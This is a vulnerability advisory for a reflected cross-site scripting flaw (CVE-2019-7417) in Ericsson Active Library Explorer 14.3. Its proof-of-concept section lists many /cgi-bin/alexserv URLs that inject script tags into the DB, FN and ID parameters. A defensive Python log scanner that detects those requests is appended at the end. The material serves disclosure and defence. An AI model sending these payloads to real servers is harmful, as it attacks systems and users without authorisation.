Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

2019.02.11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

<!--
# Exploit Title: Cross Site Scripting in Ericsson Active Library Explorer Server Version 14.3
# Date: 23-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.ericsson.com
# Software Link: http://www.ericsson.com
# Version: Ericsson Active Library Explorer Server Version 14.3
# Tested on: all
# CVE : CVE-2019-7417
# Category: webapps

1. Description

XSS exists in Ericsson Active Library Explorer (ALEX) 14.3 in multiple parameters in the "/cgi-bin/alexserv" servlet, as demonstrated by the DB, FN, fn, or id parameter.

Active Library Explorer (ALEX) is server-based software that enables users to browse Ericsson document libraries and documents with a standard web browser. It consists of the following two parts, which are typically used in two different web browser windows:

- Library View: this part contains functions for accessing libraries within a folder structure. For example, it is possible to search for libraries, download libraries, or compare library variants. It is also possible to start a search for documents in several libraries at the same time.
- Document View: this part contains functions for accessing documents inside a library. For example, it is possible to search for documents or within documents in individual libraries, and to print or bookmark documents.

2. Proof of Concept

URL: http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: fn=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: id=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&fn=docno_metadata.txt
Parameter: id=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=23034&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: fn=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ID=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=hlex_help.html
Parameter: ID=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ID=3020&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: FN=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=alex.html
Parameter: DB=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: FN=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: FN=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&ac=image&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: fn=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=alex_help.ahx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&CH=LibraryBrowser
Parameter: FN=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=12446-2885Uen.E.html
Parameter: DB=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&AC=image&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter: FN=<SCRIPT>alert("XSS");</SCRIPT>

URL: http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=help.html&CH=LibraryBrowser
Parameter: DB=<SCRIPT>alert("XSS");</SCRIPT>

3. Solution:

Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
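
A defender-side check for the request shapes listed in the proof of concept, as an added example that is not part of the original advisory or of Ericsson's code: it scans web-server access logs for markup characters in the DB, FN/fn and ID/id parameters of /cgi-bin/alexserv and reports the HTML-encoded form that output encoding would have produced. The combined-log request format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as reflected (matched case-insensitively,
# since the PoC URLs use both DB/FN/ID and fn/id).
REFLECTED_PARAMS = {"db", "fn", "id"}
SERVLET_PATH = "/cgi-bin/alexserv"
# Characters that must never reach an HTML response unencoded.
MARKUP = re.compile(r"[<>\"']")
# Request line inside a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(name, decoded_value, html_encoded_value)] for one request target."""
    parts = urlsplit(target)
    if parts.path != SERVLET_PATH:
        return []
    hits = []
    # parse_qsl percent-decodes, so %3CSCRIPT%3E is inspected as <SCRIPT>.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in REFLECTED_PARAMS and MARKUP.search(value):
            hits.append((name, value, html.escape(value, quote=True)))
    return hits


def scan_log(lines):
    """Yield (line_number, hits) for log lines with markup in a reflected parameter."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jan/2019:10:00:01 +0100] "GET /cgi-bin/alexserv?ID=3020&FN=hlex_help.html HTTP/1.1" 200 5120',
    '192.0.2.44 - - [23/Jan/2019:10:00:07 +0100] "GET /cgi-bin/alexserv?ID=3020&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E HTTP/1.1" 200 811',
    '192.0.2.44 - - [23/Jan/2019:10:00:09 +0100] "GET /index.html?fn=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        for name, value, encoded in hits:
            print(f"line {number}: {name}={value!r} should render as {encoded}")
```
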

